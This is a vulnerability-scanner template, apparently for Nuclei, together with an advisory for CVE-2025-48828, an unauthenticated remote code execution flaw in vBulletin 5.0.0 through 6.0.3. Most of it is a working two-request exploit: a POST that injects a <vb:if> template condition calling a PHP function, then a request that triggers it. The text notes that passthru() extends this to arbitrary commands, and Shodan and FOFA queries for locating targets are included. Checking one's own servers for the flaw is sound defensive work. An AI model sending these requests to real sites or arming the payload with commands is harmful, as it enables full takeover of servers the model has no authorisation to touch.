vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
PoC代码[已公开]
id: CVE-2025-48828
info:
name: vBulletin replaceAdTemplate - Remote Code Execution
author: DhiyaneshDK, Chocapikk
severity: critical
description: |
vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
impact: |
Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
remediation: |
Upgrade to vBulletin 6.0.4+ and apply the official patch to restrict access to protected controller methods and secure the ajax/api/ad/replaceAdTemplate endpoint.
reference:
- https://karmainsecurity.com/pocs/vBulletin-replaceAdTemplate-RCE.php
- https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
- https://nvd.nist.gov/vuln/detail/CVE-2025-48827
- https://nvd.nist.gov/vuln/detail/CVE-2025-48828
classification:
epss-score: 0.68656
epss-percentile: 0.98578
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-48828
cwe-id: CWE-424
metadata:
verified: true
max-request: 1
vendor: vbulletin
product: vbulletin
fofa-query: app="vBulletin"
shodan-query: http.component:"vBulletin"
tags: cve,cve2025,rce,vbulletin,intrusive,vkev
variables:
rand_string: "{{to_lower(rand_base(5))}}"
rand_value: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=<vb:if condition='"var_dump"("{{rand_value}}")'></vb:if>
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body,'string(5)','{{rand_value}}')
condition: and
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
routestring=ajax/render/ad_{{rand_string}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body,'string(5)','{{rand_value}}')
condition: and
# digest: 4a0a00473045022100b78d941d13114dc78919e05a7f7057a38e758274ca01fd5563befb8059a2266002200a69ecc0d034427ed2328c63222acaa9284a2f9e3de49c15be601f9a9684e75d:922c64590222798bb761d5b6d8e72950